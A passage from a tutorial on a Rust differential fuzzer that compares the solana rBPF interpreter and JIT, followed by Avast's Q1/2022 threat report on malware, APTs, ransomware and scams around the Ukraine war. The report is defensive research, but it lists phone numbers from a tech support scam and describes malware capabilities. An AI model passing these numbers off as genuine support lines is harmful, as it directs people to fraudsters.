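    WithDynamicStackFrames,
}

// Map the template onto vm::Config so that `data.template.into()` (used in
// step 2) yields a Config the VM understands.
impl From<ConfigTemplate> for Config {
    fn from(template: ConfigTemplate) -> Config {
        match template {
            ConfigTemplate::Default => Config::default(),
            ConfigTemplate::WithTracing => Config {
                enable_instruction_tracing: true,
                ..Config::default()
            },
            ConfigTemplate::WithDynamicStackFrames => Config {
                dynamic_stack_frames: true,
                ..Config::default()
            },
        }
    }
}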
Step 2: Setting up the VM
fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    ... snip ...
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem_region])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        // See step 3
    }
});
Step 3: Executing our input and comparing output
fuzz_target!(|data: FuzzData| {
    // see step 2

    if Executable::jit_compile(&mut executable).is_ok() {
        // see step 2

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});
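One detail worth making explicit, as a small sketch of my own rather than part of the original harness: both meters start from the same budget of 1 << 16, so comparing the remaining counts is equivalent to comparing how many instructions each VM actually executed.

// Sketch only (hypothetical helper, not in the fuzzer): recover the executed
// instruction count from a meter that started with the 1 << 16 budget above.
const INSN_BUDGET: u64 = 1 << 16;

fn instructions_executed(remaining: u64) -> u64 {
    INSN_BUDGET.saturating_sub(remaining)
}

// If interp_meter.remaining == jit_meter.remaining, then both VMs consumed
// the same number of instructions from the shared budget.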
Step 4: Put it together

Below is the final code for the fuzzer, including all of the bits I didn’t show above for concision.

#![no_main]

use std::collections::BTreeMap;

use libfuzzer_sys::fuzz_target;

use grammar_aware::*;
use solana_rbpf::{
    ebpf,
    elf::{register_bpf_function, Executable},
    insn_builder::{Arch, Instruction, IntoBytes},
    memory_region::MemoryRegion,
    user_error::UserError,
    verifier::check,
    vm::{EbpfVm, SyscallRegistry, TestInstructionMeter},
};

use crate::common::ConfigTemplate;

mod common;
mod grammar_aware;

#[derive(arbitrary::Arbitrary, Debug)]
struct FuzzData {
    template: ConfigTemplate,
    exit_dst: u8,
    exit_src: u8,
    exit_off: i16,
    exit_imm: i64,
    prog: FuzzProgram,
    mem: Vec<u8>,
}

fuzz_target!(|data: FuzzData| {
    let mut prog = make_program(&data.prog, Arch::X64);
    prog.exit()
        .set_dst(data.exit_dst)
        .set_src(data.exit_src)
        .set_off(data.exit_off)
        .set_imm(data.exit_imm)
        .push();
    let config = data.template.into();
    if check(prog.into_bytes(), &config).is_err() {
        // verify please
        return;
    }
    let mut interp_mem = data.mem.clone();
    let mut jit_mem = data.mem;
    let registry = SyscallRegistry::default();
    let mut bpf_functions = BTreeMap::new();
    register_bpf_function(&config, &mut bpf_functions, &registry, 0, "entrypoint").unwrap();
    let mut executable = Executable::<UserError, TestInstructionMeter>::from_text_bytes(
        prog.into_bytes(),
        None,
        config,
        SyscallRegistry::default(),
        bpf_functions,
    )
    .unwrap();
    if Executable::jit_compile(&mut executable).is_ok() {
        let interp_mem_region = MemoryRegion::new_writable(&mut interp_mem, ebpf::MM_INPUT_START);
        let mut interp_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![interp_mem_region])
                .unwrap();
        let jit_mem_region = MemoryRegion::new_writable(&mut jit_mem, ebpf::MM_INPUT_START);
        let mut jit_vm =
            EbpfVm::<UserError, TestInstructionMeter>::new(&executable, &mut [], vec![jit_mem_region])
                .unwrap();

        let mut interp_meter = TestInstructionMeter { remaining: 1 << 16 };
        let interp_res = interp_vm.execute_program_interpreted(&mut interp_meter);
        let mut jit_meter = TestInstructionMeter { remaining: 1 << 16 };
        let jit_res = jit_vm.execute_program_jit(&mut jit_meter);
        if interp_res != jit_res {
            panic!("Expected {:?}, but got {:?}", interp_res, jit_res);
        }
        if interp_res.is_ok() {
            // we know jit res must be ok if interp res is by this point
            if interp_meter.remaining != jit_meter.remaining {
                panic!(
                    "Expected {} insts remaining, but got {}",
                    interp_meter.remaining, jit_meter.remaining
                );
            }
            if interp_mem != jit_mem {
                panic!(
                    "Expected different memory. From interpreter: {:?}\nFrom JIT: {:?}",
                    interp_mem, jit_mem
                );
            }
        }
    }
});

Theoretically, an up-to-date version is available in the rBPF repo.

And, with that, we have our fuzzer! This part of the fuzzer took approximately three hours to implement (largely due to finding several issues with the fuzzer and debugging them along the way).

At this point, we were about six hours in. I turned on the fuzzer and waited:

$ cargo +nightly fuzz run smart-jit-diff --jobs 4 -- -ignore_crashes=1

And the crashes began. Two main bugs appeared:

  1. A panic when there was an error in the interpreter, but not in JIT, when writing to a particular address (crash in 15 minutes)
  2. An AddressSanitizer crash from a memory leak when an error occurred just after the instruction limit was passed by the JIT’d program (crash in two hours)

To read the details of these bugs, continue to Part 2.

Avast Q1/2022 Threat Report

5 May 2022 at 06:04

Cyberwarfare between Ukraine and Russia

Foreword

The first quarter of 2022 is over, so we are here again to share insights into the threat landscape and what we’ve seen in the wild. Under normal circumstances, I would probably highlight mobile spyware related to the Beijing 2022 Winter Olympics, yet another critical Java vulnerability (Spring4Shell), or perhaps how long it took malware authors to get back from their Winter holidays to their regular operations. Unfortunately, however, all of this was overshadowed by Russia’s war in Ukraine.

Similar to what’s happening on the ground in Ukraine, the warfare co-occurring in cyberspace is very intensive, with a wide range of offensive tools in use. To name a few examples, we witnessed multiple Russia-attributed APT groups attacking Ukraine (deploying a series of wipers and ransomware, a massive uptick in Gamaredon APT toolkit activity, and disruptions of satellite internet connections). In addition, hacktivism, DDoS attacks on government sites, and data leaks are ongoing daily on all sides of the conflict. Furthermore, some malware authors and operators were directly affected by the war, such as the alleged death of the Raccoon Stealer lead developer, which resulted in the (at least temporary) discontinuation of this particular threat. Additionally, some malware gangs have chosen sides in this conflict and have started threatening the others. One such example is the Conti gang, which promised ransomware retaliation for cyberattacks against Russia. You can find more details about this story in this report.

With all that said, it is hardly surprising that we’ve seen a significant increase in attacks by particular malware types in the countries involved in this conflict in Q1/2022; for example, blocked RAT attacks grew by 50% in Ukraine, Russia, and Belarus, botnet attacks by 30%, and info stealer attacks by 20%. To help the victims of these attacks, we developed and released multiple free ransomware decryption tools, including one for HermeticRansom, which we discovered in Ukraine just a few hours before the invasion started.

As for other malware-related Q1/2022 news: the groups behind Emotet and Trickbot appeared to be working closely together, resurrecting Trickbot-infected computers by moving them under Emotet control and deprecating Trickbot afterward. Furthermore, this report describes massive info-stealing campaigns in Latin America, large adware campaigns in Japan, and technical support scams spreading in the US and Canada. Finally, the Lapsus$ hacking group emerged with breaches of big tech companies, including Microsoft, Nvidia, and Samsung, but hopefully also disappeared after multiple arrests of its members in March.

Last but not least, we’ve published our discovery of the latest Parrot Traffic Direction System (TDS) campaign that has emerged in recent months and is reaching users from around the world. This TDS has infected various web servers hosting more than 16,500 websites.

Stay safe and enjoy reading this report.

Jakub Křoustek, Malware Research Director

Methodology

This report is structured into two main sections – Desktop-related threats, covering our intelligence on attacks targeting Windows, Linux, and macOS, and Mobile-related threats, covering Android and iOS attacks.

Furthermore, we use the term risk ratio in this report to describe the severity of particular threats, calculated as a monthly average of “Number of attacked users / Number of active users in a given country.” Unless stated otherwise, calculated risks are only available for countries with more than 10,000 active users per month.
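For illustration only, the calculation behind the risk ratio can be sketched as follows (the numbers in the usage comment are made up, not Avast telemetry):

// Hedged sketch: risk ratio = monthly average of (attacked users / active users).
fn risk_ratio(monthly: &[(u64, u64)]) -> f64 {
    // `monthly` holds (attacked_users, active_users) pairs, one per month.
    let sum: f64 = monthly
        .iter()
        .map(|&(attacked, active)| attacked as f64 / active as f64)
        .sum();
    sum / monthly.len() as f64
}

// e.g. risk_ratio(&[(12_000, 1_000_000), (15_000, 1_000_000), (9_000, 1_000_000)])
// == 0.012, i.e. about 1.2% of active users faced an attack in an average month.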

Desktop-Related Threats

Advanced Persistent Threats (APTs)

In March, we wrote about an APT campaign targeting betting companies in Taiwan, the Philippines, and Hong Kong that we called Operation Dragon Castling. The attacker, a Chinese-speaking group, leveraged two different ways to gain a foothold in the targeted devices – an infected installer sent in a phishing email and a newly identified vulnerability in the WPS Office updater (CVE-2022-24934). After successful infection, the malware used a diverse set of plugins to achieve privilege escalation, persistence, keylogging, and backdoor access.

Operation Dragon Castling: relations between the malicious files

Furthermore, on February 23rd, a day before Russia started its invasion of Ukraine, ESET tweeted that they discovered a new data wiper called HermeticWiper. The attackers’ motivation was to maximize damage to the infected system: the malware not only corrupts the MBR but also destroys the filesystem and individual files. Shortly after that, we at Avast discovered a related piece of ransomware that we called HermeticRansom. You can find more on this topic in the Ransomware section below. These attacks are believed to have been carried out by Russian APT groups.

Continuing this subject, Gamaredon is known as the most active Russia-backed APT group targeting Ukraine. This group’s typically high level of activity in Ukraine accelerated rapidly after the Russian invasion began at the end of February, when the number of their attacks grew several times over.

Gamaredon APT activity Q4/2021 vs. Q1/2022

Gamaredon APT targeting in Q1/22

We also noticed an increase in Korplug activity which expanded its focus from the more usual south Asian countries such as Myanmar, Vietnam, or Thailand to Papua New Guinea and Africa. The most affected African countries are Ghana, Uganda and Nigeria. As Korplug is commonly attributed to Chinese APT groups, this new expansion aligns with their long-term interest in countries involved in China’s Belt and Road initiative.

New Korplug detections in Africa and Papua New Guinea

Luigino Camastra, Malware Researcher
Igor Morgenstern, Malware Researcher
Jan Holman, Malware Researcher

Adware

Desktop adware became more aggressive in Q4/21, and a similar trend persisted into Q1/22, as the graph below illustrates:

On the other hand, there are some interesting phenomena in Q1/22. Firstly, Japan’s proportion of adware activity has increased significantly in February and March; see the graph below. There is also an interesting correlation with Emotet hitting Japanese inboxes in the same period.

On the contrary, the situation in Ukraine led to a decrease in the adware activity in March; see the graph below showing the adware activity in Ukraine in Q1/22.

Finally, another interesting observation concerns adware activity in major European countries such as France, Germany, and the United Kingdom. The graph below shows increased activity in these countries in March, deviating from the trend of Q1/22.

Concerning the top strains, the majority of adware (64%) came from a variety of smaller adware families. The first clearly identified family is RelevantKnowledge; its prevalence is still low (5%), but it grew by 97% compared to Q4/21. Other identified strains, each in the low single-digit percentages, are ICLoader, Neoreklami, DownloadAssistant, and Conduit.

As mentioned above, adware activity followed a similar trend to Q4/21, so the risk ratios remained roughly the same. The most affected regions are still Africa and Asia. Looking at Q1/22 data, we observed an increase in protected users in Japan (+209%) and France (+87%) compared with Q4/21; on the other hand, decreases were observed in the Russian Federation (-51%) and Ukraine (-50%).

Adware risk ratio in Q1/22.

Martin Chlumecký, Malware Researcher

Bots

It seems that we are on a rollercoaster with Emotet and Trickbot. Last year, we went through Emotet’s takedown and its resurrection via Trickbot. This quarter, shutdowns of Trickbot’s infrastructure and leaks of Conti’s internal communication indicate that Trickbot has finished its swan song. Its developers were supposedly moved to other Conti projects, possibly including BazarLoader as Conti’s new product. Emotet also introduced a few changes – we’ve seen a much higher cadence of new, unique configurations. We’ve also seen a new configuration timestamp, “20220404”, interestingly appearing on 24th March, instead of the “20211114” value we had become accustomed to seeing.

There has been a new-ish trend coming with the advent of the war in Ukraine. Simple JavaScript code has been used to create requests to (mostly) Russian web pages – ranging from media to businesses to banks. The code was accompanied by text denouncing Russian aggression in Ukraine in multiple languages. It quickly spread around the internet in different variations, such as a variant of the open-source game 2048. Unfortunately, we’ve started to see web pages that incorporated the code without declaring it, so your computer could end up participating in those actions while you were just checking the weather online. While these could remind us of Anonymous DDoS operations and LOIC (the open-source stress tool Low Orbit Ion Cannon), these pages were much more accessible to the public, requiring only a browser and coming with (mostly) predetermined lists of targets. Nearing the end of March, we saw a significant decline in their popularity, both in terms of prevalence and the appearance of new variants.

The rest of the landscape brings few surprises. We’ve seen a significant risk increase in Russia (~30%) and Ukraine (~15%); these shouldn’t come as much of a surprise, though for the latter the increase does not translate into a large number of affected clients.

In terms of numbers, the most prevalent strain was Emotet, which doubled its market share since last quarter. Most of the other top strains slightly declined in prevalence since the previous quarter. The most common strains we are seeing are:

  • Emotet
  • Amadey
  • Phorpiex
  • MyloBot
  • Nitol
  • MyKings
  • Dorkbot
  • Tofsee
  • Qakbot

Adolf Středa, Malware Researcher

Coinminers

Coincidentally, just as cryptocurrency prices have been somewhat stable these days, so has malicious coinmining activity in our user base.

In comparison with the previous quarter, crypto-mining threat actors increased their focus on Taiwan (+69%), Chile (+63%), Thailand (+61%), Malawi (+58%), and France (+58%). This is mainly caused by the continued and increasing use of various web miners that execute JavaScript code in the victim’s browser. On the other hand, the risk of getting infected significantly dropped in Denmark (-56%) and Finland (-50%).

The most common coinminers in Q1/22 were:

  • XMRig
  • NeoScrypt
  • CoinBitMiner
  • CoinHelper

Jan Rubín, Malware Researcher

Information Stealers

The activity of information stealers hasn’t significantly changed in Q1/22 compared to Q4/21. FormBook, AgentTesla, and RedLine remain the most prevalent stealers; combined, they account for 50% of the hits within the category.

Activity of Information Stealers in Q1/22.

We noticed that the regional distribution completely shifted compared to the previous quarter. In Q4/21, Singapore, Yemen, Turkey, and Serbia were the countries most affected by information stealers; in Q1/22, Russia, Brazil, and Argentina rose to the top tier after increases in risk ratio of 27% (RU), 21% (BR), and 23% (AR) compared to the previous quarter.

Not only is Latin America a popular destination for information stealers, it also houses many region-specific stealers capable of compromising victims’ banking accounts. As the underground hacking culture continues to develop in Brazil, these threat groups target their fellow citizens for financial gain. In Brazil, Ousaban and Chaes pose the most significant threats, with more than 100k and 70k hits, respectively. In Mexico in Q1/22, we observed more than 34k hits from Casbaneiro. A typical pattern shared by these groups is a multi-stage delivery chain that uses scripting languages to download and deploy the next stage’s payload while employing DLL sideloading techniques to execute the final stage.

Furthermore, Raccoon Stealer, an information stealer with Russian origins, has significantly decreased in activity since March. Further investigation uncovered messages on Russian underground forums advising that the Raccoon group is no longer operating. A few days after the messages were posted, a Raccoon representative said one of their members had died in the war in Ukraine – they have paused operations and plan to return in a few months with a new product.

Next, a macOS malware strain dubbed DazzleSpy was found spreading via watering hole attacks targeting Chinese pro-democracy sympathizers; it was primarily active in Asia. This backdoor can remotely control macOS, execute arbitrary commands, and download and upload files to the attackers, enabling keychain stealing, key-logging, and potentially screen capture.

Last but not least, more malware that natively runs on M1 Apple chips (and Intel hardware) has been found. The malware family, SysJoker, targets all desktop platforms (Linux, Windows, and macOS); the backdoor is controlled remotely and allows downloading other payloads and executing remote commands.

Anh Ho, Malware Researcher
Igor Morgenstern, Malware Researcher
Vladimir Martyanov, Malware Researcher
Vladimír Žalud, Malware Analyst

Ransomware

We’ve previously reported a decline in the total number of ransomware attacks in Q4/21. In Q1/22, this trend continued with a further slight decrease. As can be seen in the following graph, there was a drop at the beginning of 2022; the number of ransomware attacks has since stabilized.

We believe there are multiple reasons for these recent declines – such as the geopolitical situation (discussed shortly) and the continuing trend of ransomware gangs focusing more on targeted attacks against big targets (big game hunting) rather than on regular users via spray-and-pray techniques. In other words, ransomware is still a significant threat, but the attackers have slightly changed their targets and tactics. As you will see in the rest of this section, the total numbers are lower, but there was a lot going on in the ransomware world in Q1.

Based on our telemetry, the distribution of targeted countries is similar to Q4/21 with some Q/Q shifts, such as Mexico (+120% risk ratio), Japan (+37%), and India (+34%).

The most (un)popular ransomware strains – STOP and WannaCry – kept their positions at the top. Operators of the STOP ransomware keep releasing new variants, and the same applies to the CrySiS ransomware. In both cases, the ransomware code hasn’t evolved considerably, so a new variant merely means a new extension for encrypted files, a different contact e-mail, and a different public RSA key.

The most prevalent ransomware strains in Q1/22:

  • WannaCry
  • STOP
  • VirLock
  • GlobeImposter
  • Makop

Out of the groups primarily focused on targeted attacks, the most active ones based on our telemetry were LockBit, Conti, and Hive. The BlackCat (aka ALPHV) ransomware was also on the rise. The LockBit group boosted their presence and also their egos, as demonstrated by their claim that they would pay a $1M bounty to any FBI agent who reveals their location. Later, they expanded that offer to any person on the planet.

You may also recall Sodinokibi (aka REvil), which is regularly mentioned in our threat reports. There is always something interesting around this ransomware strain and its operators with ties to Russia. In our Q4/21 Threat Report we reported on the arrests of some of its operators by Russian authorities. Indeed, this resulted in Sodinokibi almost vanishing from the threat landscape in Q1/2022. However, the situation got messy at the very end of Q1/2022 and early in April, as new Sodinokibi indicators started appearing, including the publishing of new leaks from ransomed companies and malware samples. It is not yet clear whether this is a comeback, an imposter operation, reused Sodinokibi sources or infrastructure, or some combination of these by multiple groups. Our gut feeling is that Sodinokibi will be a topic in the Q2/22 Threat Report once again.

Russian ransomware affiliates are a never-ending story. For example, February brought an interesting public exposure of a criminal dubbed Wazawaka, who has ties to Babuk, DarkSide, and other ransomware gangs. In a series of drunk videos and tweets, he revealed much more than his missing finger.

The Russian invasion of Ukraine and the war that followed, the most terrible event of Q1/22, had its counterpart in cyberspace. Just one day before the invasion, several cyber attacks were detected. Shortly after the discovery of the HermeticWiper malware by ESET, Avast also discovered ransomware attacking Ukrainian targets. We dubbed it HermeticRansom. Shortly after, a flaw in the ransomware was found by CrowdStrike analysts. We acted swiftly and released a free decryptor to help victims in Ukraine. Furthermore, the war impacted ransomware attacks, as some ransomware authors and affiliates are from Ukraine and have likely been unable to carry out their operations due to the war.

And the cyber-war went on, together with the real one. A day after the start of the invasion, the Conti ransomware gang pledged its allegiance to Russia and threatened anyone considering organizing a cyber-attack or war activities against Russia:

As a reaction, a Ukrainian researcher started publishing internal files of the Conti gang, including Jabber conversations and the source code of the Conti ransomware itself. However, no significant number of encryption keys was leaked. Also, the published sources were older versions of the Conti ransomware, which no longer correspond to the layout of the encrypted files created by today’s version of the ransomware. The leaked files and internal communications provide valuable insight into this large cybercrime organization, and they also temporarily slowed down its operations.

Among the other consequences of the Conti leak, the published source code was soon used by the NB65 hacking group. This gang declared a karmic war on Russia and used a modified version of the Conti ransomware source to attack Russian targets.

Furthermore, in February, members of one of the historically most active (and successful) ransomware groups, Maze, announced the shut-down of their operation. They published master decryption keys for their ransomware strains Maze, Egregor, and Sekhmet; four archive files were published that contained:

  • 19 private RSA-2048 keys for Egregor ransomware. Egregor uses a three-key encryption schema (Master RSA Key → Victim RSA Key → Per-file Key).
  • 30 private RSA-2048 keys (plus 9 from old version) for Maze ransomware. Maze also uses a three-key encryption scheme.
  • A single private RSA-2048 key for Sekhmet ransomware. Because this strain uses this RSA key to encrypt the per-file key, the RSA private key is likely campaign specific.
  • The source code for the M0yv x86/x64 file infector, which was used by Maze operators in the past.

Next, an unpleasant turn of events happened after we released a decryptor for the TargetCompany ransomware in February. This immediately helped multiple ransomware victims; however, two weeks later, we discovered a new variant of TargetCompany that started using the “.avast” extension for encrypted files. Shortly after, the malware authors changed the encryption algorithm, so our free decryption tool does not decrypt the most recent variant.

On the bright side, we also analyzed multiple variants of the Prometheus ransomware and released a free decryptor. This one covers all decryptable variants of the ransomware strain, even the latest ones.

Jakub Křoustek, Malware Research Director
Ladislav Zezula, Malware Researcher

Remote Access Trojans (RATs)

New year, new me, new RAT campaigns. As mentioned in the Q4/21 report, we expected the downward trend in RAT activity to be only temporary, and reality proved to be a textbook example of this claim. Even malicious actors took holidays at the beginning of the new year and then returned to work.

In the graph below, we can see a Q4/21 vs. Q1/22 comparison of RAT activity:

The countries most affected this quarter were China, Tajikistan, Kyrgyzstan, Iraq, Kazakhstan, and Russia. Kazakhstan will be mentioned later on in connection with the emergence of a new RAT. We also detected a high Q/Q increase in the risk ratio in countries involved in the ongoing war: Ukraine (+54%), Russia (+53%), and Belarus (+46%).

In this quarter, we spotted a new campaign distributing several RATs, reaching thousands of users, mainly in Italy (1,900), Romania (1,100), and Bulgaria (950). The campaign leverages a crypter (a tool used by malware authors to obfuscate and protect the target payload), which we call Rattler, that distributes arbitrary malware onto the victim’s PC. Currently, the crypter primarily distributes remote access trojans, focusing on Warzone, Remcos, and NetWire. Warzone’s main targeting campaigns also seemed to change during the past three months. In January and February, we received a considerable number of detections from Russia and Ukraine. This trend reversed in March, with decreased detections in these two countries and a significant increase in Spain, indicating a new malicious campaign.

The most prevalent RATs in Q1/22 were:

  • njRAT
  • Warzone
  • Remcos
  • AsyncRat
  • NanoCore
  • NetWire
  • QuasarRAT
  • PoisonIvy
  • Adwind
  • Orcus

Among the malicious families with the highest increase in detections were Lilith, LuminosityLink, and Gh0stCringe. One of the reasons for the Gh0stCringe increase is a malicious campaign in which this RAT spread on poorly protected MySQL and Microsoft SQL database servers. We also witnessed a change in the first two places of the most prevalent RATs. In Q4/21, the most pervasive was Warzone, which declined by 23% this quarter. The njRAT family, on the other hand, increased by 32%, and, surprisingly, Adwind entered the top 10.

Beyond the usual malicious campaigns, this quarter was different for two significant reasons. The first was the Lapsus$ hacking and leaking spree, and the other was the war in Ukraine.

The hacking group Lapsus$ targeted many prominent technology companies like Nvidia, Samsung, and Microsoft. In the NVIDIA case, for example, the group stole about 1TB of NVIDIA’s data and then began leaking it. The leaked data contained binary signing certificates, which were later used for signing malicious binaries. Among such signed malware was, for example, the Quasar RAT.

Then there was the conflict in Ukraine, which showed the power of information technology and the importance of cyber security – because the fight happens not only on the battlefield but also in cyberspace, with DDoS attacks, data stealing, exploitation, cyber espionage, and other techniques. But beyond the countries directly involved in the war, everyday people looking for information are easy targets of malicious campaigns. One such campaign involved sending email messages with attached office documents that allegedly contained important information about the war. Unfortunately, these documents were just a way to infect people with the Remcos RAT via the Microsoft Office RCE vulnerability CVE-2017-11882, thanks to which the attacker could easily infect unpatched systems.

As always, it wasn’t only old, known RATs that showed up; this quarter brought us a few new ones as well. The first addition to our RAT list was IceBot. This RAT seems to be a creation of the APT group FIN7; it contains the usual basic capabilities seen in other RATs, such as taking screenshots, remote code execution, file transfer, and detection of installed AV.

Another one is Hodur. This RAT is a variant of PlugX (also known as Korplug), associated with Chinese APT organizations. Hodur differs in its encoding, configuration capabilities, and C&C commands. This RAT allows attackers to log keystrokes, manipulate files, fingerprint the system, and more.

We mentioned that Kazakhstan is connected to a new RAT on this list. That RAT is called Borat RAT. The name is taken from the popular comedy film Borat, in which the main character, Borat Sagdijev, played by actor Sacha Baron Cohen, is presented as a Kazakh visiting the USA. Did you know that, in reality, the scenes meant to depict life in a Kazakh village weren’t even filmed in Kazakhstan, but in the Romanian village of Glod?

This RAT is a .NET binary and uses simple source-code obfuscation. The Borat RAT was initially discovered on hacking forums and contains many capabilities. Some features include triggering BSODs, anti-sandbox and anti-VM checks, password stealing, web-cam spying, file manipulation, and more. As well as these baked-in features, it enables extensive module functionality. These modules are DLLs that are downloaded on demand, allowing the attackers to add new capabilities. The list of currently available modules includes “Ransomware.dll”, used for encrypting files, “Discord.dll”, for stealing Discord tokens, and many more.

Here you can see an example of the Borat RAT admin panel. 

We also noticed that the volume of Python-compiled and Go ELF binaries for Linux increased this quarter. The threat actors used open source RAT projects (e.g. Bring Your Own Botnet or Ares) and legitimate services (e.g. Onion.pet, termbin.com or Discord) to compromise systems. We were also one of the first to protect users against the Backdoorit and Caligula RATs; both of these malware families were written in Go and captured in the wild by our honeypots.

Samuel Sidor, Malware Researcher
Jan Rubín, Malware Researcher
David Álvarez, Malware Researcher

Rootkits

In Q1/22, rootkit activity was reduced compared to the previous quarter, returning to its long-term level, as illustrated in the chart below.

The close-up view of Q1/22 shows that January and February were more active than March.

We monitored various rootkit strains in Q1/22. However, we identified that approx. 37% of rootkit activity comes from r77-Rootkit (R77RK), developed by bytecode77 as an open-source project under the BSD license. The rootkit operates in Ring 3, unlike the usual rootkits that work in Ring 0. R77RK is a configurable tool hiding files, directories, scheduled tasks, processes, services, connections, etc. The tool is compatible with Windows 7 and Windows 10. As a consequence, R77RK has been captured alongside several different types of malware, serving as a supporting library for malware that needs to hide its activity.

The graph below shows that China is still the most at-risk country in terms of protected users. Moreover, the risk in China has increased by about +58%, although total rootkit activity has been orders of magnitude lower compared to Q4/21. This phenomenon is caused by the absence of the Cerbu rootkit, which had been spread worldwide, so the main rootkit activity has moved back to China. Decreases in rootkit activity were observed in Vietnam, Thailand, the Czech Republic, and Egypt.

In summary, the situation around rootkit activity seems calmer compared to Q4/21, and China remains the most affected country in Q1/22. Notably, the war in Ukraine has not increased rootkit activity. Numerous malware authors have started using open-source rootkit implementations, although these are easily detectable.

Martin Chlumecký, Malware Researcher

Technical support scams

After quite an active Q4/21 that overlapped with the beginning of Q1/22, technical support scams started to decline in activity. There were some small peaks of activity, but the significant wave of one particular campaign came at the end of Q1/22.

According to our data, the most targeted countries were the United States and Canada. However, we’ve seen instances of this campaign active in other areas as well, such as Europe – for example, France and Germany.

The distinctive sign of this campaign was the lack of a domain name and a specific path; this is illustrated in the following image.

At the beginning of March, we collected thousands of new unique domain-less URLs that share one significant and distinctive sign: their URL path. After being redirected, an affected user loads a web page with a well-known recycled appearance, used in many previous technical support campaigns. In addition, several pop-up windows, the logos of well-known companies, antivirus-like messaging, cursor manipulation techniques, and even sounds are all there for one simple reason: to get the victim to call the phone number shown.

More than twenty different phone numbers have been used. Examples of such numbers can be seen in the following table:

1-888-828-5604
1-888-200-5532
1-877-203-5120
1-888-770-6555
1-855-433-4454
1-833-576-2199
1-877-203-9046
1-888-201-5037
1-866-400-0067
1-888-203-4992

Alexej Savčin, Malware Analyst

Traffic Direction System (TDS)

A new Traffic Direction System (TDS) we are calling Parrot TDS was very active throughout Q1/2022. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university and local government sites.

Parrot TDS acts as a gateway for other malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.

From March 1, 2022, to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. We protected the most users in Brazil (over 73,000), followed by India (nearly 55,000) and the US (more than 31,000).

Map illustrating the countries Parrot TDS has targeted (in March)

Jan Rubín, Malware Researcher
Pavel Novák, Threat Operations Analyst

Vulnerabilities and Exploits

Spring in Europe has had quite a few surprises for us, one of them being a vulnerability in a Java framework called, ironically, Spring. The vulnerability is called Spring4Shell (CVE-2022-22965), mimicking the name of last year’s Log4Shell vulnerability. Similarly to Log4Shell, Spring4Shell leads to remote code execution (RCE). Under specific conditions, it is possible to bind HTTP request parameters to Java objects. While there is logic protecting classLoader from being used, it was not foolproof, which led to this vulnerability. Fortunately, the vulnerability requires a non-default configuration, and a patch is already available.

The Linux kernel had its share of vulnerabilities as well; one that can be exploited for local privilege escalation was found in pipes, which provide unidirectional interprocess communication. The vulnerability was dubbed Dirty Pipe (CVE-2022-0847). It relies on the usage of partially uninitialized memory of the pipe buffer during its construction, leading to an incorrect value of flags, potentially providing write access to pages in the cache that were originally marked with a read-only attribute. The vulnerability is already patched in the latest kernel versions and has already been fixed in most mainstream Linux distributions.

First described by Trend Micro researchers in 2019, the SLUB malware is a highly targeted and sophisticated backdoor/RAT spread via browser exploits. Now, three years later, we detected a new exploitation attack of theirs, which took place in Japan and targeted an outdated version of Internet Explorer.

The initial exploit injects into winlogon.exe, which will, in turn, download and execute the final stage payload. The final stage has not changed much since the initial report; it still uses Slack as a C&C server but now uses file[.]io for data exfiltration.

This is an excellent example of how old threats never really go away; they often continue to evolve and pose a threat.

Adolf Středa, Malware Researcher
Jan Vojtěšek, Malware Researcher

Mikrotik CVEs keep giving

It’s been almost four years since the very severe vulnerability CVE-2018-14847 targeting MikroTik devices first appeared. What seemed to be yet another directory traversal bug quickly escalated into user database and password leaks, resulting in a potentially disastrous vulnerability ready to be misused by cybercriminals. Unfortunately, the ease of exploitation, the wide adoption of these devices, and their powerful features provided a solid foundation for various malicious campaigns. It started with injecting crypto mining JavaScript into web pages by capturing traffic, then moved on to poisoning the DNS cache and incorporating these devices into botnets for DDoS and proxy purposes.

Unfortunately, these campaigns come in waves, and we still observe MikroTik devices being misused repeatedly. In Q1/22, we’ve seen a lot of exciting twists and turns, the most prominent of which was probably the Conti group leaks, which also shed light on the TrickBot botnet. For quite some time, we knew that TrickBot abused MikroTik devices as proxy servers to hide the next tier of their C&C. The leaking of the Conti and TrickBot infrastructure meant the end of this botnet. However, it also provided us with clues and information about one of the vastest botnet-as-a-service operations, connecting Glupteba, Meris, crypto mining campaigns, and, perhaps also, TrickBot. We are talking about 230K devices controlled by one threat actor and rented out as a service. You can find more in our research Mēris and TrickBot standing on the shoulders of giants.

